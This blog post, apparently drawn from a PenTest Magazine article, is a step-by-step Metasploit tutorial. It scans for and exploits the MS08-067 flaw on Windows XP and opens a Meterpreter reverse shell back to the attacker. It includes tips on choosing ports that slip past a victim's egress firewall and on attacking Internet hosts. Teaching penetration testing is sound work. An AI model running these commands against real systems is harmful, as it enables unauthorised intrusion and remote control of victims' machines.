Exploitation and Metasploit

If a vulnerable host has been discovered and identified it is time for the real deal. The Metasploit
Framework contains hundreds of exploits. Running

show exploits

from msfconsole will display
every exploit available in the Framework. Other valid parameters for the “show” command are
all, encoders, nops, exploits, payloads, auxiliary, plugins and options.

Exploiting your target
We are going to attack a Windows XP SP2 machine with exploit MS08-067. To discover if the
target machine is vulnerable to this exploit, we are going to use nmap and script smb-check-
vulns
. Fire up your msfconsole and execute,

nmap -sS -A --script=smb-check-vulns -P0
192.168.1.5

If your target machine is vulnerable, search for ms08_067_netapi and enable it,

use windows/smb/ms08_067_netapi

Now we need to select our payload. We will use
Windows-based Meterpreter reverse tcp. To select this payload execute,

set PAYLOAD
windows/meterpreter/reverse_tcp

To view a list of available payloads for the exploit execute

show payloads

If everything goes well a connection will be created from the target machine back to your
attacking machine. Reverse tcp allows us to succeed in compromising the target system in case
the target machine is behind a firewall or NAT and it is impossible to bind a tcp. After selecting
the payload we have to specify exactly our target because this exploit is specific to the operating
system version, service pack and language. Execute

show targets

to see a list of possible
exploit targets.

To select your target execute

set TARGET 4

for example. Set the options and type

exploit

When you are using reverse tcp payload don’t forget to close your firewall and check your router
if it is blocking any port, otherwise you will not see a shell waiting for your commands if the
exploit was successful. If you are attacking a system on the Internet you will have to use your
external ip address in the LHOST option. You should use port 80, 53, 8080 or port 443 in the
LPORT option because if the target machine is behind a firewall and the outbound traffic is
filtered, ports 80, 53, 800 and 443 would likely be allowed for outgoing connections, otherwise
the victim’s firewall may drop all unintended packet which will go through another port except 80,
53, 8080 and 443. Don’t forget to configure your router to redirect all incoming traffic to port 443,
53, 8080 or port 80 to your local IP address (attacking machine).

Search for allowed ports automatically
If you find it hard to locate a port that is allowed through the firewall, Metasploit offers the
command search ports. This payload searches for open ports? By trying every available ports
connecting outbound until it finds an open one. This process may take quite a long time.
If you manage to open one or more sessions you can list your active sessions by executing

sessions -l

To interact with an active session, issue the command

sessions -i num

where num
is the number of the session. A Meterpreter shell will open and if we enter shell, we will jump
into a windows command line shell!

 
This post is part of my article about metasploit which was originally published in PenTest Magazine, August issue.

%d bloggers like this: